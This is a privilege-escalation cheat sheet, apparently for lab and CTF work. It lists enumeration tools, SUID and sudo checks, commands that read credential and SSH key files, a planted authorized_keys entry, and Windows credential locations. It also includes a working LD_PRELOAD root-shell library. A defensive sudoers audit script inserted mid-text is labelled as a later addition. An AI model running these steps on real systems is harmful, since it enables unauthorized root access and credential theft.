# Privilege Escalation

## Enumeration Scripts

* [LinEnum](https://github.com/rebootuser/LinEnum.git)
* [Linuxprivchecker](https://github.com/sleventyeleven/linuxprivchecker)
* [Seatbelt](https://github.com/GhostPack/Seatbelt)
* [JAWS](https://github.com/411Hall/JAWS)
* [PEASS-ng](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)

## Techniques

### Kernel Exploits

Look up publicly known exploits for the running kernel version.

### Vulnerable Software

{% tabs %}
{% tab title="List packages (Linux)" %}

```bash
dpkg -l
```

{% endtab %}

{% tab title="List installed software (Windows)" %}

```powershell
dir "C:\Program Files"
```

{% endtab %}
{% endtabs %}

### User Privileges

{% tabs %}
{% tab title="Sudo" %}

```bash
sudo -l
```

{% endtab %}

{% tab title="SUID" %}

```bash
find / -perm /4000 2>/dev/null
```

{% endtab %}

{% tab title="SGID" %}

```bash
find / -perm /2000 2>/dev/null
```

{% endtab %}

{% tab title="SUID / SGID" %}

```bash
find / -perm /6000 2>/dev/null
```

{% endtab %}

{% tab title="Windows Token Privileges" %}

```powershell
whoami /priv
```

```powershell
whoami /all
```

{% endtab %}
{% endtabs %}

### Scheduled Tasks

{% tabs %}
{% tab title="Crontab directories" %}

```bash
/etc/crontab
/etc/cron.d
/var/spool/cron/crontabs/root
```

{% endtab %}

{% tab title="List crontab" %}

```bash
crontab -l
```

{% endtab %}

{% tab title="Edit a crontab" %}

```bash
crontab -e
```

{% endtab %}
{% endtabs %}

### Exposed Credentials

{% tabs %}
{% tab title="History" %}

```bash
cat ~/.bash_history
```

{% endtab %}

{% tab title="Configuration files" %}

```bash
cat /var/www/html/config.php
```

{% endtab %}
{% endtabs %}

### SSH Keys

{% tabs %}
{% tab title="Get private SSH Key" %}

```bash
cat /home/qu35t/.ssh/id_rsa
```

{% endtab %}

{% tab title="Generate SSH Key" %}

```bash
ssh-keygen -t ed25519 -f qu35t
```

{% endtab %}

{% tab title="Add an authorised key" %}

```bash
echo 'PUBLIC SSH KEY' >> /home/qu35t/.ssh/authorized_keys
```

```bash
chmod 600 /home/qu35t/.ssh/authorized_keys
```

{% endtab %}

{% tab title="SSH with private SSH key" %}

```bash
ssh -i qu35t qu35t@10.10.10.10
```

{% endtab %}
{% endtabs %}

### LD\_PRELOAD

{% tabs %}
{% tab title="Program" %}

```c
#define _GNU_SOURCE          /* setresuid() is a GNU extension */
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

/* Runs as the library constructor (-nostartfiles replaces the default _init). */
void _init() {
    unsetenv("LD_PRELOAD");  /* avoid re-injecting into the child shell */
    setresuid(0,0,0);
    system("/bin/bash -p");
}
```

{% endtab %}

{% tab title="Compile" %}

```bash
gcc -fPIC -shared -nostartfiles -o ./load.so ./ld.c
```

{% endtab %}

{% tab title="Load the library" %}

```bash
sudo LD_PRELOAD=/dev/shm/load.so /opt/script.sh
```

{% endtab %}
{% endtabs %}
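As an added defensive check (not from the original cheat sheet): the `sudo LD_PRELOAD=...` step only succeeds when sudoers preserves `LD_PRELOAD` through `env_keep`, so this POSIX shell audit scans sudoers files for that setting. The `qu35t` rules and both sample files are constructed here, and `LOADER_ENV_KEEP_RE`, `sudoers_preserves_loader_vars` and `count_loader_env_keep` are names introduced for this example.

```shell
#!/bin/sh
# Added audit helper, not part of the original cheat sheet. The LD_PRELOAD
# step above only works when sudo keeps the loader variables, i.e. sudoers
# carries a line such as:   Defaults env_keep += "LD_PRELOAD"
# This scans sudoers files for that setting so it can be removed.

# Matches uncommented Defaults lines whose env_keep adds LD_PRELOAD or
# LD_LIBRARY_PATH; '#' comments (leading or trailing) are ignored.
LOADER_ENV_KEEP_RE='^[[:space:]]*Defaults[^#]*env_keep[[:space:]]*\+?=[^#]*LD_(PRELOAD|LIBRARY_PATH)'

# Print the offending lines of one sudoers file, prefixed with its path.
# Returns 0 if at least one was found, 1 if the file is clean.
sudoers_preserves_loader_vars() {
    grep -HE "$LOADER_ENV_KEEP_RE" "$1"
}

# Total number of offending lines across the given files (e.g.
# /etc/sudoers /etc/sudoers.d/*); missing or unreadable paths count as 0.
count_loader_env_keep() {
    total=0
    for f in "$@"; do
        [ -f "$f" ] || continue
        n=$(grep -cE "$LOADER_ENV_KEEP_RE" "$f" 2>/dev/null) || true
        total=$((total + ${n:-0}))
    done
    echo "$total"
}

# Constructed sample files standing in for /etc/sudoers.d entries:
# one with the weak setting and one with it removed.
AUDIT_DIR=$(mktemp -d)
cat > "$AUDIT_DIR/10-weak" <<'EOF'
Defaults env_reset
Defaults env_keep += "LD_PRELOAD"
# Defaults env_keep += "LD_LIBRARY_PATH"   (commented out: must not match)
qu35t ALL=(root) NOPASSWD: /opt/script.sh
EOF
cat > "$AUDIT_DIR/20-fixed" <<'EOF'
Defaults env_reset
qu35t ALL=(root) NOPASSWD: /opt/script.sh
EOF

sudoers_preserves_loader_vars "$AUDIT_DIR/10-weak" || :
echo "loader env_keep entries found: $(count_loader_env_keep "$AUDIT_DIR"/*)"
```

On a real host run `count_loader_env_keep /etc/sudoers /etc/sudoers.d/*` as root; any line it reports should be deleted so that sudo's default `env_reset` strips the loader variables.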

## Windows

{% tabs %}
{% tab title="Unattended Windows Installations" %}

```powershell
C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
```

{% endtab %}

{% tab title="Powershell History" %}

```powershell
%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
```

{% endtab %}

{% tab title="Saved Windows Credentials" %}

```powershell
cmdkey /list
```

```powershell
runas /savecred /user:admin cmd.exe
```

{% endtab %}

{% tab title="IIS Configuration" %}

```powershell
C:\inetpub\wwwroot\web.config
```

```powershell
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
```

{% endtab %}
{% endtabs %}

{% tabs %}
{% tab title="Scheduled Tasks" %}

```powershell
schtasks /query /tn vulntask /fo list /v
```

```powershell
icacls c:\tasks\schtask.bat
```

{% endtab %}

{% tab title="List Services" %}

```
HKLM\SYSTEM\CurrentControlSet\Services\
```

```powershell
sc qc apphostsvc
```

{% endtab %}
{% endtabs %}

## References

* [GTFOBins](https://gtfobins.github.io/)
* [LOLBAS](https://lolbas-project.github.io)
